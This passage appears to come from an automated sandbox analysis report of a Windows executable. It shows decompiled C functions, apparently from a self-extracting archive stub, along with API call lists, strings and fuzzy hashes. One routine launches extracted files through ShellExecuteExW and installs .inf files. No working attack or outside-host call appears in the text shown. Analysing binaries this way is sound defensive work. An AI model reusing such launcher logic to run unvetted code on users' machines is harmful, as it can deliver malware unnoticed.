                                                                            											_t383 = _t357 + 1;
                                                                            											_t390[0x16] = _t273;
                                                                            											L48:
                                                                            											_t316 = _t316 + 1;
                                                                            											__eflags = _t316 - 4;
                                                                            										} while (_t316 < 4);
                                                                            										_t387 = _t390[0x12];
                                                                            										_t316 = 0;
                                                                            										__eflags = _t273;
                                                                            										if(__eflags != 0) {
                                                                            											_t228 = _t390[0x1a];
                                                                            											if(__eflags <= 0) {
                                                                            												goto L71;
                                                                            											} else {
                                                                            												goto L59;
                                                                            											}
                                                                            											while(1) {
                                                                            												L59:
                                                                            												_t351 =  *(_t228 + _t383 * 2) & 0x0000ffff;
                                                                            												__eflags = _t351 - _t375;
                                                                            												if(_t351 == _t375) {
                                                                            													goto L61;
                                                                            												}
                                                                            												L60:
                                                                            												_t132 =  &(_t390[0x15]); // 0x9
                                                                            												__eflags = _t351 -  *_t132;
                                                                            												if(_t351 !=  *_t132) {
                                                                            													_t376 = _t228 + _t383 * 2;
                                                                            													_t390[0x18] = _t316;
                                                                            													_t274 = 0x20;
                                                                            													_t352 = _t316;
                                                                            													__eflags =  *_t376 - _t274;
                                                                            													if( *_t376 <= _t274) {
                                                                            														L66:
                                                                            														 *((short*)(_t390 + _t352 * 2 - 0x19c)) = 0;
                                                                            														E001A11FA(_t390 - 0x19c, _t390 - 0x70, 0x64);
                                                                            														_t383 = _t383 + _t390[0x18];
                                                                            														_t279 = _t390[0x16];
                                                                            														__eflags = _t279 - 3;
                                                                            														if(_t279 != 3) {
                                                                            															__eflags = _t279 - 1;
                                                                            															_t280 = "$%s:";
                                                                            															if(_t279 != 1) {
                                                                            																_t280 = "@%s:";
                                                                            															}
                                                                            															E0019D9DC(_t390 - 0xd4, 0x64, _t280, _t390 - 0x70);
                                                                            															_t394 = _t394 + 0x10;
                                                                            														} else {
                                                                            															_t284 = E001B2B69(_t390 - 0x19c, _t390 - 0x19c, L"RTL");
                                                                            															asm("sbb al, al");
                                                                            															 *((char*)(_t387 + 0x64)) =  ~_t284 + 1;
                                                                            														}
                                                                            														goto L51;
                                                                            													} else {
                                                                            														goto L63;
                                                                            													}
                                                                            													while(1) {
                                                                            														L63:
                                                                            														__eflags = _t352 - 0x63;
                                                                            														if(_t352 >= 0x63) {
                                                                            															break;
                                                                            														}
                                                                            														_t287 =  *_t376;
                                                                            														_t376 = _t376 + 2;
                                                                            														 *((short*)(_t390 + _t352 * 2 - 0x19c)) = _t287;
                                                                            														_t352 = _t352 + 1;
                                                                            														_t288 = 0x20;
                                                                            														__eflags =  *_t376 - _t288;
                                                                            														if( *_t376 > _t288) {
                                                                            															continue;
                                                                            														}
                                                                            														break;
                                                                            													}
                                                                            													_t390[0x18] = _t352;
                                                                            													goto L66;
                                                                            												}
                                                                            												L61:
                                                                            												_t383 = _t383 + 1;
                                                                            												L59:
                                                                            												_t351 =  *(_t228 + _t383 * 2) & 0x0000ffff;
                                                                            												__eflags = _t351 - _t375;
                                                                            												if(_t351 == _t375) {
                                                                            													goto L61;
                                                                            												}
                                                                            												goto L60;
                                                                            											}
                                                                            										}
                                                                            										E0019FA56(_t390 - 0xd4, 0x1c2624, 0x64);
                                                                            										goto L51;
                                                                            									}
                                                                            									__eflags = _t373 - _t390[0x13];
                                                                            									if(_t373 != _t390[0x13]) {
                                                                            										goto L80;
                                                                            									}
                                                                            									goto L42;
                                                                            									L52:
                                                                            									__eflags = _t383 - _t390[0x19];
                                                                            								} while (_t383 < _t390[0x19]);
                                                                            								_t218 = _t390[0x1b];
                                                                            								_t371 = _t390[0x17];
                                                                            								goto L54;
                                                                            							} else {
                                                                            								L001B2B4E(_t382);
                                                                            								goto L57;
                                                                            							}
                                                                            						}
                                                                            						_t333 = _t328 >> 1;
                                                                            						_t390[0x19] = _t333;
                                                                            						goto L33;
                                                                            					} else {
                                                                            						goto L5;
                                                                            					}
                                                                            					do {
                                                                            						L5:
                                                                            						E001A3393(_t387, _t370, _t380);
                                                                            						E001A3393(_t387 + 0x14, _t370, _t380);
                                                                            						_t380 = _t380 + 1;
                                                                            						_t399 = _t380 -  *0x1cd5f4; // 0x63
                                                                            					} while (_t399 < 0);
                                                                            					_t316 = 0;
                                                                            					goto L7;
                                                                            				}
                                                                            			}








































































                                                                            0x0019d275
                                                                            0x0019d27a
                                                                            0x0019d27e
                                                                            0x0019d281
                                                                            0x0019d284
                                                                            0x0019d284
                                                                            0x0019d289
                                                                            0x0019d28b
                                                                            0x0019d28d
                                                                            0x0019d28d
                                                                            0x0019d293
                                                                            0x0019d2a3
                                                                            0x0019d2a8
                                                                            0x0019d2ad
                                                                            0x0019d2b2
                                                                            0x0019d2b6
                                                                            0x0019d2b8
                                                                            0x0019d2c6
                                                                            0x0019d2ca
                                                                            0x0019d2cc
                                                                            0x0019d2ce
                                                                            0x0019d2d1
                                                                            0x0019d2d4
                                                                            0x0019d2d6
                                                                            0x0019d2d9
                                                                            0x0019d3c1
                                                                            0x0019d3ca
                                                                            0x0019d3d2
                                                                            0x0019d3da
                                                                            0x0019d3e1
                                                                            0x0019d3e4
                                                                            0x0019d3fe
                                                                            0x0019d40b
                                                                            0x0019d413
                                                                            0x0019d425
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0019d3e6
                                                                            0x0019d3e6
                                                                            0x0019d3ea
                                                                            0x0019d3f3
                                                                            0x0019d3f8
                                                                            0x0019d3f9
                                                                            0x0019d3f9
                                                                            0x00000000
                                                                            0x0019d3e6
                                                                            0x0019d2df
                                                                            0x0019d2e6
                                                                            0x0019d2ed
                                                                            0x0019d2f4
                                                                            0x0019d2f4
                                                                            0x0019d2f7
                                                                            0x0019d2f9
                                                                            0x0019d5f5
                                                                            0x0019d5f5
                                                                            0x0019d5f9
                                                                            0x0019d5fa
                                                                            0x0019d5fd
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0019d603
                                                                            0x0019d607
                                                                            0x0019d659
                                                                            0x0019d65a
                                                                            0x0019d65d
                                                                            0x0019d683
                                                                            0x0019d690
                                                                            0x0019d695
                                                                            0x0019d698
                                                                            0x0019d69a
                                                                            0x0019d67b
                                                                            0x0019d67b
                                                                            0x00000000
                                                                            0x0019d67b
                                                                            0x0019d661
                                                                            0x0019d662
                                                                            0x0019d665
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0019d667
                                                                            0x0019d667
                                                                            0x0019d66d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0019d676
                                                                            0x0019d67a
                                                                            0x0019d67a
                                                                            0x00000000
                                                                            0x0019d67a
                                                                            0x0019d609
                                                                            0x0019d60f
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0019d619
                                                                            0x0019d619
                                                                            0x0019d61c
                                                                            0x0019d643
                                                                            0x0019d645
                                                                            0x0019d648
                                                                            0x0019d649
                                                                            0x0019d64d
                                                                            0x0019d64e
                                                                            0x0019d651
                                                                            0x00000000
                                                                            0x0019d651
                                                                            0x0019d61e
                                                                            0x0019d61e
                                                                            0x0019d621
                                                                            0x0019d63f
                                                                            0x00000000
                                                                            0x0019d63f
                                                                            0x0019d623
                                                                            0x0019d623
                                                                            0x0019d626
                                                                            0x0019d63b
                                                                            0x00000000
                                                                            0x0019d63b
                                                                            0x0019d628
                                                                            0x0019d628
                                                                            0x0019d62b
                                                                            0x0019d637
                                                                            0x00000000
                                                                            0x0019d637
                                                                            0x0019d62e
                                                                            0x0019d631
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0019d633
                                                                            0x00000000
                                                                            0x0019d633
                                                                            0x0019d2ff
                                                                            0x0019d304
                                                                            0x0019d308
                                                                            0x0019d314
                                                                            0x0019d316
                                                                            0x0019d317
                                                                            0x0019d31b
                                                                            0x0019d508
                                                                            0x0019d50b
                                                                            0x0019d512
                                                                            0x0019d517
                                                                            0x0019d519
                                                                            0x0019d5ef
                                                                            0x0019d5ef
                                                                            0x0019d5f2
                                                                            0x00000000
                                                                            0x0019d5f2
                                                                            0x0019d52b
                                                                            0x0019d53c
                                                                            0x0019d541
                                                                            0x0019d546
                                                                            0x0019d548
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0019d550
                                                                            0x0019d563
                                                                            0x0019d575
                                                                            0x0019d587
                                                                            0x0019d596
                                                                            0x0019d5ab
                                                                            0x0019d5b0
                                                                            0x0019d5b3
                                                                            0x0019d5b5
                                                                            0x0019d5b7
                                                                            0x0019d5b7
                                                                            0x0019d5ba
                                                                            0x0019d5c0
                                                                            0x0019d5c0
                                                                            0x0019d5d3
                                                                            0x0019d5d3
                                                                            0x0019d5d5
                                                                            0x0019d5d8
                                                                            0x0019d5d9
                                                                            0x0019d5d9
                                                                            0x0019d5dd
                                                                            0x0019d5e0
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0019d5e2
                                                                            0x0019d5e2
                                                                            0x0019d5e2
                                                                            0x0019d5e6
                                                                            0x0019d3af
                                                                            0x0019d3af
                                                                            0x00000000
                                                                            0x0019d3af
                                                                            0x0019d5ec
                                                                            0x0019d5ec
                                                                            0x0019d5d9
                                                                            0x0019d5dd
                                                                            0x0019d5e0
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0019d5e0
                                                                            0x0019d5d9
                                                                            0x0019d321
                                                                            0x0019d324
                                                                            0x0019d324
                                                                            0x0019d327
                                                                            0x0019d32a
                                                                            0x0019d331
                                                                            0x0019d338
                                                                            0x0019d33f
                                                                            0x0019d346
                                                                            0x0019d349
                                                                            0x0019d35a
                                                                            0x0019d361
                                                                            0x0019d366
                                                                            0x0019d36b
                                                                            0x0019d36c
                                                                            0x0019d36e
                                                                            0x0019d386
                                                                            0x0019d386
                                                                            0x00000000
                                                                            0x0019d386
                                                                            0x0019d373
                                                                            0x0019d375
                                                                            0x0019d37a
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0019d37c
                                                                            0x0019d37e
                                                                            0x0019d381
                                                                            0x0019d389
                                                                            0x0019d389
                                                                            0x0019d38a
                                                                            0x0019d38a
                                                                            0x0019d38f
                                                                            0x0019d392
                                                                            0x0019d394
                                                                            0x0019d396
                                                                            0x0019d44c
                                                                            0x0019d44f
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0019d455
                                                                            0x0019d455
                                                                            0x0019d455
                                                                            0x0019d459
                                                                            0x0019d45c
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0019d45e
                                                                            0x0019d45e
                                                                            0x0019d45e
                                                                            0x0019d462
                                                                            0x0019d467
                                                                            0x0019d46a
                                                                            0x0019d46f
                                                                            0x0019d470
                                                                            0x0019d472
                                                                            0x0019d475
                                                                            0x0019d496
                                                                            0x0019d498
                                                                            0x0019d4ad
                                                                            0x0019d4b2
                                                                            0x0019d4b5
                                                                            0x0019d4b8
                                                                            0x0019d4bb
                                                                            0x0019d4de
                                                                            0x0019d4e1
                                                                            0x0019d4e6
                                                                            0x0019d4e8
                                                                            0x0019d4e8
                                                                            0x0019d4fb
                                                                            0x0019d500
                                                                            0x0019d4bd
                                                                            0x0019d4c9
                                                                            0x0019d4d1
                                                                            0x0019d4d6
                                                                            0x0019d4d6
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0019d477
                                                                            0x0019d477
                                                                            0x0019d477
                                                                            0x0019d47a
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0019d47c
                                                                            0x0019d47f
                                                                            0x0019d482
                                                                            0x0019d48a
                                                                            0x0019d48d
                                                                            0x0019d48e
                                                                            0x0019d491
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0019d491
                                                                            0x0019d493
                                                                            0x00000000
                                                                            0x0019d493
                                                                            0x0019d464
                                                                            0x0019d464
                                                                            0x0019d455
                                                                            0x0019d455
                                                                            0x0019d459
                                                                            0x0019d45c
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0019d45c
                                                                            0x0019d455
                                                                            0x0019d3aa
                                                                            0x00000000
                                                                            0x0019d3aa
                                                                            0x0019d30a
                                                                            0x0019d30e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0019d3b2
                                                                            0x0019d3b2
                                                                            0x0019d3b2

                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 0019CFD9
                                                                            • _wcschr.LIBVCRUNTIME ref: 0019CFFA
                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0019D015
                                                                            • __fprintf_l.LIBCMT ref: 0019D4FB
                                                                              • Part of subcall function 001A0FDE: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0019B312,00000000,?,?,?,0019004A), ref: 001A0FFA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                                                                            • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                                                                            • API String ID: 4184910265-4124877899
                                                                            • Opcode ID: 6ccc42262a0324fa4820e0620aa60d9aaf9475260b28857c08834e36b094faa0
                                                                            • Instruction ID: 519220876122de840959d97db729ae614ddf64d50551602ac12c7ff7dfddde06
                                                                            • Opcode Fuzzy Hash: 6ccc42262a0324fa4820e0620aa60d9aaf9475260b28857c08834e36b094faa0
                                                                            • Instruction Fuzzy Hash: AC12CFB1A00309ABDF24EFA4EC45BED37A9FF24704F50016AF90997291EB70D985CB50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E001AC190(intOrPtr _a4, long _a8) {
                                                                            				char _v67;
                                                                            				intOrPtr _v72;
                                                                            				signed int _v84;
                                                                            				int _v88;
                                                                            				void* _v92;
                                                                            				intOrPtr _t40;
                                                                            				intOrPtr _t43;
                                                                            				struct HWND__* _t45;
                                                                            				char _t48;
                                                                            
                                                                            				E001AA388(); // executed
                                                                            				_t45 = GetDlgItem( *0x1d75c8, 0x68);
                                                                            				_t48 =  *0x1d75d6; // 0x1
                                                                            				if(_t48 == 0) {
                                                                            					_t43 =  *0x1d75e8; // 0x0
                                                                            					E001A8569(_t43);
                                                                            					ShowWindow(_t45, 5); // executed
                                                                            					SendMessageW(_t45, 0xb1, 0, 0xffffffff);
                                                                            					SendMessageW(_t45, 0xc2, 0, 0x1c22e4);
                                                                            					 *0x1d75d6 = 1;
                                                                            				}
                                                                            				SendMessageW(_t45, 0xb1, 0x5f5e100, 0x5f5e100);
                                                                            				_v92 = 0x5c;
                                                                            				SendMessageW(_t45, 0x43a, 0,  &_v92);
                                                                            				_v67 = 0;
                                                                            				_t40 = _a4;
                                                                            				_v88 = 1;
                                                                            				if(_t40 != 0) {
                                                                            					_v72 = 0xa0;
                                                                            					_v88 = 0x40000001;
                                                                            					_v84 = _v84 & 0xbfffffff | 1;
                                                                            				}
                                                                            				SendMessageW(_t45, 0x444, 1,  &_v92);
                                                                            				SendMessageW(_t45, 0xc2, 0, _a8);
                                                                            				SendMessageW(_t45, 0xb1, 0x5f5e100, 0x5f5e100);
                                                                            				if(_t40 != 0) {
                                                                            					_v84 = _v84 & 0xfffffffe | 0x40000000;
                                                                            					SendMessageW(_t45, 0x444, 1,  &_v92);
                                                                            				}
                                                                            				return SendMessageW(_t45, 0xc2, 0, L"\r\n");
                                                                            			}













                                                                            APIs
                                                                              • Part of subcall function 001AA388: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 001AA399
                                                                              • Part of subcall function 001AA388: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 001AA3AA
                                                                              • Part of subcall function 001AA388: IsDialogMessageW.USER32(0019004A,?), ref: 001AA3BE
                                                                              • Part of subcall function 001AA388: TranslateMessage.USER32(?), ref: 001AA3CC
                                                                              • Part of subcall function 001AA388: DispatchMessageW.USER32(?), ref: 001AA3D6
                                                                            • GetDlgItem.USER32(00000068,001EDE38), ref: 001AC1A4
                                                                            • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,?,?,?,?,?,?,001A9D8F), ref: 001AC1CF
                                                                            • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 001AC1DE
                                                                            • SendMessageW.USER32(00000000,000000C2,00000000,001C22E4), ref: 001AC1E8
                                                                            • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 001AC1FE
                                                                            • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 001AC214
                                                                            • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 001AC254
                                                                            • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 001AC25E
                                                                            • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 001AC26D
                                                                            • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 001AC290
                                                                            • SendMessageW.USER32(00000000,000000C2,00000000,001C304C), ref: 001AC29B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                            • String ID: \
                                                                            • API String ID: 3569833718-2967466578
                                                                            • Opcode ID: d1b7296f3001f96af391f9da297f5294dbbc7e10b2467228c95c601a138f5d97
                                                                            • Instruction ID: 98161ec30ebef278d46b98e0ee4c33511a122f57caa01873d8c6cc5b03c0d193
                                                                            • Opcode Fuzzy Hash: d1b7296f3001f96af391f9da297f5294dbbc7e10b2467228c95c601a138f5d97
                                                                            • Instruction Fuzzy Hash: 9521437124A3047BE311FB24AC41FAF7F9CEF92754F000619FA90A61D1D7A59A098BB7
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 48%
                                                                            			E001AC431(struct _SHELLEXECUTEINFOW _a4, char* _a8, char* _a16, signed short* _a20, signed short* _a24, int _a32, void* _a48, char _a52, intOrPtr _a56, char _a64, struct HWND__* _a4160, signed short* _a4168, intOrPtr _a4172) {
                                                                            				signed short _v0;
                                                                            				long _v12;
                                                                            				void* __edi;
                                                                            				int _t54;
                                                                            				signed int _t57;
                                                                            				signed short* _t58;
                                                                            				long _t68;
                                                                            				int _t77;
                                                                            				signed int _t80;
                                                                            				signed short* _t81;
                                                                            				signed short _t82;
                                                                            				intOrPtr _t84;
                                                                            				long _t86;
                                                                            				signed short* _t87;
                                                                            				struct HWND__* _t89;
                                                                            				signed short* _t91;
                                                                            				void* _t93;
                                                                            				void* _t95;
                                                                            				void* _t99;
                                                                            
                                                                            				_t54 = 0x1040;
                                                                            				E001AD940();
                                                                            				_t91 = _a4168;
                                                                            				_t77 = 0;
                                                                            				if( *_t91 == 0) {
                                                                            					L55:
                                                                            					return _t54;
                                                                            				}
                                                                            				_t54 = E001B2B33(_t91);
                                                                            				if(0x1040 >= 0x7f6) {
                                                                            					goto L55;
                                                                            				} else {
                                                                            					_t86 = 0x3c;
                                                                            					E001AE920(_t86,  &_a4, 0, _t86);
                                                                            					_t84 = _a4172;
                                                                            					_t99 = _t99 + 0xc;
                                                                            					_a4.cbSize = _t86;
                                                                            					_a8 = 0x1c0;
                                                                            					if(_t84 != 0) {
                                                                            						_a8 = 0x5c0;
                                                                            					}
                                                                            					_t80 =  *_t91 & 0x0000ffff;
                                                                            					_t87 =  &(_t91[1]);
                                                                            					_t95 = 0x22;
                                                                            					if(_t80 != _t95) {
                                                                            						_t87 = _t91;
                                                                            					}
                                                                            					_a20 = _t87;
                                                                            					_t57 = _t77;
                                                                            					if(_t80 == 0) {
                                                                            						L13:
                                                                            						_t58 = _a24;
                                                                            						L14:
                                                                            						if(_t58 == 0 ||  *_t58 == _t77) {
                                                                            							if(_t84 == 0 &&  *0x1da602 != _t77) {
                                                                            								_a24 = 0x1da602;
                                                                            							}
                                                                            						}
                                                                            						_a32 = 1;
                                                                            						_t93 = E0019B153(_t87);
                                                                            						if(_t93 != 0 && E001A1410(_t93, L".inf") == 0) {
                                                                            							_a16 = L"Install";
                                                                            						}
                                                                            						if(E00199E6B(_a20) != 0) {
                                                                            							_push(0x800);
                                                                            							_push( &_a64);
                                                                            							_push(_a20);
                                                                            							E0019AED7();
                                                                            							_a8 =  &_a52;
                                                                            						}
                                                                            						_t54 = ShellExecuteExW( &_a4); // executed
                                                                            						if(_t54 != 0) {
                                                                            							_t89 = _a4160;
                                                                            							if( *0x1d85f8 != _t77 || _a4168 != _t77 ||  *0x1ede21 != _t77) {
                                                                            								if(_t89 != 0) {
                                                                            									_push(_t89);
                                                                            									if( *0x1cdf24() != 0) {
                                                                            										ShowWindow(_t89, _t77);
                                                                            										_t77 = 1;
                                                                            									}
                                                                            								}
                                                                            								 *0x1cdf20(_a56, 0x7d0);
                                                                            								E001AC8F0(_a48);
                                                                            								if( *0x1ede21 != 0 && _a4160 == 0 && GetExitCodeProcess(_a48,  &_v12) != 0) {
                                                                            									_t68 = _v12;
                                                                            									if(_t68 >  *0x1ede24) {
                                                                            										 *0x1ede24 = _t68;
                                                                            									}
                                                                            									 *0x1ede22 = 1;
                                                                            								}
                                                                            							}
                                                                            							CloseHandle(_a48);
                                                                            							if(_t93 == 0 || E001A1410(_t93, L".exe") != 0) {
                                                                            								_t54 = _a4160;
                                                                            								if( *0x1d85f8 != 0 && _t54 == 0 &&  *0x1ede21 == _t54) {
                                                                            									 *0x1ede28 = 0x1b58;
                                                                            								}
                                                                            							} else {
                                                                            								_t54 = _a4160;
                                                                            							}
                                                                            							if(_t77 != 0 && _t54 != 0) {
                                                                            								_t54 = ShowWindow(_t89, 1);
                                                                            							}
                                                                            						}
                                                                            						goto L55;
                                                                            					}
                                                                            					_t81 = _t91;
                                                                            					_v0 = 0x20;
                                                                            					do {
                                                                            						if( *_t81 == _t95) {
                                                                            							while(1) {
                                                                            								_t57 = _t57 + 1;
                                                                            								if(_t91[_t57] == _t77) {
                                                                            									break;
                                                                            								}
                                                                            								if(_t91[_t57] == _t95) {
                                                                            									_t82 = _v0;
                                                                            									_t91[_t57] = _t82;
                                                                            									L10:
                                                                            									if(_t91[_t57] == _t82 ||  *((short*)(_t91 + 2 + _t57 * 2)) == 0x2f) {
                                                                            										if(_t91[_t57] == _v0) {
                                                                            											_t91[_t57] = 0;
                                                                            										}
                                                                            										_t58 =  &(_t91[_t57 + 1]);
                                                                            										_a24 = _t58;
                                                                            										goto L14;
                                                                            									} else {
                                                                            										goto L12;
                                                                            									}
                                                                            								}
                                                                            							}
                                                                            						}
                                                                            						_t82 = _v0;
                                                                            						goto L10;
                                                                            						L12:
                                                                            						_t57 = _t57 + 1;
                                                                            						_t81 =  &(_t91[_t57]);
                                                                            					} while ( *_t81 != _t77);
                                                                            					goto L13;
                                                                            				}
                                                                            			}























                                                                            APIs
                                                                            • ShellExecuteExW.SHELL32(000001C0), ref: 001AC55F
                                                                            • ShowWindow.USER32(?,00000000,?,?,?,?,?,?,?), ref: 001AC5A4
                                                                            • GetExitCodeProcess.KERNEL32 ref: 001AC5DC
                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 001AC602
                                                                            • ShowWindow.USER32(?,00000001,?,?,?,?,?,?,?), ref: 001AC691
                                                                              • Part of subcall function 001A1410: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,0019ACFE,?,?,?,0019ACAD,?,-00000002,?,00000000,?), ref: 001A1426
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
                                                                            • String ID: $.exe$.inf
                                                                            • API String ID: 3686203788-2452507128
                                                                            • Opcode ID: 2e5708a0c44adea39b145f5c234ce25f04e104bb84500247a092fc54fc10d00c
                                                                            • Instruction ID: 11f27376471ace537de771e3f26994db896b2decc35cefdb6c2efd89170a0a08
                                                                            • Opcode Fuzzy Hash: 2e5708a0c44adea39b145f5c234ce25f04e104bb84500247a092fc54fc10d00c
                                                                            • Instruction Fuzzy Hash: A75135785083809BDB31DF64E954ABBB7E8AF9A704F04081DF4C597250D7B1D984C7D6
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 71%
                                                                            			E001B95A5(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
                                                                            				signed int _v8;
                                                                            				int _v12;
                                                                            				void* _v24;
                                                                            				signed int _t49;
                                                                            				signed int _t54;
                                                                            				int _t57;
                                                                            				signed int _t59;
                                                                            				short* _t61;
                                                                            				signed int _t65;
                                                                            				short* _t69;
                                                                            				int _t77;
                                                                            				short* _t80;
                                                                            				signed int _t86;
                                                                            				signed int _t89;
                                                                            				void* _t94;
                                                                            				void* _t95;
                                                                            				int _t97;
                                                                            				short* _t100;
                                                                            				int _t102;
                                                                            				int _t104;
                                                                            				signed int _t105;
                                                                            				short* _t106;
                                                                            				void* _t109;
                                                                            
                                                                            				_push(__ecx);
                                                                            				_push(__ecx);
                                                                            				_t49 =  *0x1cd668; // 0x44aa1787
                                                                            				_v8 = _t49 ^ _t105;
                                                                            				_push(__esi);
                                                                            				_t102 = _a20;
                                                                            				if(_t102 > 0) {
                                                                            					_t77 = E001BDBBC(_a16, _t102);
                                                                            					_t109 = _t77 - _t102;
                                                                            					_t4 = _t77 + 1; // 0x1
                                                                            					_t102 = _t4;
                                                                            					if(_t109 >= 0) {
                                                                            						_t102 = _t77;
                                                                            					}
                                                                            				}
                                                                            				_t97 = _a32;
                                                                            				if(_t97 == 0) {
                                                                            					_t97 =  *( *_a4 + 8);
                                                                            					_a32 = _t97;
                                                                            				}
                                                                            				_t54 = MultiByteToWideChar(_t97, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t102, 0, 0);
                                                                            				_v12 = _t54;
                                                                            				if(_t54 == 0) {
                                                                            					L38:
                                                                            					return E001AE203(_t54, _v8 ^ _t105);
                                                                            				} else {
                                                                            					_t94 = _t54 + _t54;
                                                                            					_t84 = _t94 + 8;
                                                                            					asm("sbb eax, eax");
                                                                            					if((_t94 + 0x00000008 & _t54) == 0) {
                                                                            						_t80 = 0;
                                                                            						__eflags = 0;
                                                                            						L14:
                                                                            						if(_t80 == 0) {
                                                                            							L36:
                                                                            							_t104 = 0;
                                                                            							L37:
                                                                            							E001B980D(_t80);
                                                                            							_t54 = _t104;
                                                                            							goto L38;
                                                                            						}
                                                                            						_t57 = MultiByteToWideChar(_t97, 1, _a16, _t102, _t80, _v12);
                                                                            						_t120 = _t57;
                                                                            						if(_t57 == 0) {
                                                                            							goto L36;
                                                                            						}
                                                                            						_t99 = _v12;
                                                                            						_t59 = E001B9C64(_t84, _t102, _t120, _a8, _a12, _t80, _v12, 0, 0, 0, 0, 0); // executed
                                                                            						_t104 = _t59;
                                                                            						if(_t104 == 0) {
                                                                            							goto L36;
                                                                            						}
                                                                            						if((_a12 & 0x00000400) == 0) {
                                                                            							_t95 = _t104 + _t104;
                                                                            							_t86 = _t95 + 8;
                                                                            							__eflags = _t95 - _t86;
                                                                            							asm("sbb eax, eax");
                                                                            							__eflags = _t86 & _t59;
                                                                            							if((_t86 & _t59) == 0) {
                                                                            								_t100 = 0;
                                                                            								__eflags = 0;
                                                                            								L30:
                                                                            								__eflags = _t100;
                                                                            								if(__eflags == 0) {
                                                                            									L35:
                                                                            									E001B980D(_t100);
                                                                            									goto L36;
                                                                            								}
                                                                            								_t61 = E001B9C64(_t86, _t104, __eflags, _a8, _a12, _t80, _v12, _t100, _t104, 0, 0, 0);
                                                                            								__eflags = _t61;
                                                                            								if(_t61 == 0) {
                                                                            									goto L35;
                                                                            								}
                                                                            								_push(0);
                                                                            								_push(0);
                                                                            								__eflags = _a28;
                                                                            								if(_a28 != 0) {
